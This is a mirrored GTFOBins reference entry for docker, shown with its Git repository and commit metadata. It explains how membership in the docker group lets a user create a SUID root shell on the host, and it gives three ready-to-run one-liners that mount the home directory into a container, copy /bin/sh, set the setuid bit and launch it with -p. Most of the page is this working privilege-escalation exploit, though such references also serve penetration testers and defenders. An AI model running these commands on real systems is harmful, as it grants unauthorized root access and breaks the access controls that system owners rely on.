GTFOBins.github.io/docker.md at c20ade4551cbfadb6768b91ab018b7bd47158713

mirror/GTFOBins.github.io

Fork 0

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

Andrea Cardaci c20ade4551 Make docker disposable, use sh instead of bash and add description

2018-08-19 11:43:26 +02:00

837 B

Raw Blame History

description

functions

Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group. This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.

execute-interactive

sudo-enabled

suid-enabled

code
docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p

code
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p

code
./docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p

837 B Raw Blame History

837 B

Raw Blame History